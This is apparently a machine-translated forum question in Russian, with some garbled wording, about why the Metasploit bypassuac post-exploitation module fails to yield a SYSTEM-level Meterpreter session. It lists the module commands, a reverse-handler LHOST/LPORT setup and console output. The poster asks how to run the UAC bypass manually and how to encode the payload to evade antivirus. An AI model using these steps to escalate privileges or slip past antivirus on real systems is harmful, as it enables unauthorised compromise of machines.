post / windows / escalate / bypassuac для меня не получается
По какой-то причине я не могу заставить работать модуль postpassit bypassuac.
Вот что я сделал:
- Открыт сеанс meterpreter на целевой машине (как пользователь NETWORKSERVICE)
- Поместите сессию в фоновом режиме
Пытался использовать модуль после эксплуатации, как это:
использовать post / windows / escalate / bypassuac
установить сессию 1
набор LHOST 192.168.1.100
установить эксплойт LPORT 4444
Порт еще не используется, поэтому должен быть в порядке.
Вывод следующий:
[-] Обработчику не удалось привязаться к 192.168.1.100:4444
[] Запущен обратный обработчик 0.0.0.0:4444
[] Запуск обработчика полезных данных ...
[] Загрузка обходного исполняемого файла UAC в файловую систему ...
[] Исполняемый файл Meterpreter Stager длиной 73802 байта.
[] Загрузил агент в файловую систему ....
[] Выполнение почтового модуля завершено
Затем он возвращается к консоли и ничего не делает, никакого нового сеанса, ничего вообще.
Я проверил следующие вещи:
- Загрузка исполняемого файла bypassuac-x86.exe вручную в целевое устройство. Это прекрасно работало.
- Проверяется, не прозвенели ли звонки вируса сканера из исполняемого файла. Они не
Есть ли способ запустить исполняемый файл вручную, и кто-нибудь может объяснить мне, как это будет работать, чтобы открыть новый сеанс meterpreter с доступом уровня SYSTEM?
Или я могу как-то кодировать полезную нагрузку и использовать свой собственный шаблон, чтобы избежать всех возможностей антивируса? Я не нашел никакой опции для кодирования модулей после эксплуатации.
Заранее спасибо
Halvar